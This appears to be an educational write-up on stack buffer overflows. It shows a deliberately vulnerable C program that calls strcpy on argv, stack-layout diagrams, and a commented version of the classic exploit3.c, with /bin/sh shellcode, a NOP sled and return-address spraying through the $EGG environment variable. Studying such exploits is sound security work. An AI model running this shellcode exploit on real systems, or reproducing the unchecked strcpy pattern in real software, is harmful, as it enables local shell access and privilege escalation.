vulnerable.c
Any program using strcpy() or other poorly written function that does not check for the stack overflow program are vulnerable to this stack overflow attack. Here is an example program.
void main(int argc, char *argv[]) {
char buffer[512];
if (argc > 1)
strcpy(buffer,argv[1]);
}
Above is the content of a simple vulnerable program, the stack of the above program at run time would be like
Description | Memory |
BUFFER[0] BUFFER[1] BUFFER[2] BUFFER[3] . . . . BUFFER[509] BUFFER[510] BUFFER[511] Stack pointer Return address TEXT SEGMENT TEXT SEGMENT | |argv[1][0]| |argv[1][1]| |argv[1][2]| |argv[1][3]| |argv[1][4]| |argv[1][5]| |. | |ORIGINAL| |ORIGINAL| |ORIGINAL| |ORIGINAL| |ORIGINAL| |ORIGINAL| |ORIGINAL| |ORIGINAL| |
If the argument is maliciously designed to contain some bad code, and will cause buffer overflow problem, then the stack will be like
Description | Memory |
BUFFER[0] BUFFER[1] BUFFER[2] BUFFER[3] . . . . BUFFER[509] BUFFER[510] BUFFER[511] Stack pointer Return address TEXT SEGMENT TEXT SEGMENT | |argv[1][0]| |argv[1][1]| |argv[1][2]| |argv[1][3]| |argv[1][4]| |argv[1][5]| |.| |.| |argv[1][509]| |argv[1][510]| |argv[1][511]| |argv[1][512 - 515]| |argv[1][516 - 520]| |ORIGINAL| |ORIGINAL| |
And thus the program will not just return 0 when the main function reach the 'return 0;' statement, but goto where argv[1][516 - 520] is pointing to and begin to execute the code there.
expliot3.c
Here is the expliot3.c program with some comment added by me in smashing the stack for fun and profit.
Generally expliot3.c will try to find at what address the program’s stack will start (thanks to virtual memory, different programs' stacks may start at the same address), and organize a well-designed content (say $EGG) that will be used as the input of some other program (say, vulnerable.c ).
If the vulnerable.c stupidly used strcpy() (or other dangerous function) without checking whether $EGG is longer than the variable that will stored the $EGG, then the carefully designed malicious content in $EGG will be overwriting the content in process vulnerable's stack, and letting vulnerable to start execute the machine code contained in $EGG.
#include
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
} //inline assembly code, to copy the stack pointer's value to where the return value should be storing.
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
//Firstly, fill the buff with expected address
//(we expect the return pointer of the stack will be overwrite by this address)
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
//Secondly, fill the first half of the buff with NOP instruction,
//so even if the expected address doesn't directly point to the machine code,
//it will most likely point to an NOP instruction
//so that the process will continue to fetch next instruction until
//the process find a valid instruction.
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
//Thirdly, put the malicious machine code at the center of the buffer.
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"EGG=",4);
//put it into a shell's environment variable $EGG.
putenv(buff);
//spawn a new shell so that i will has $EGG as its environment variable
system("/bin/bash");
}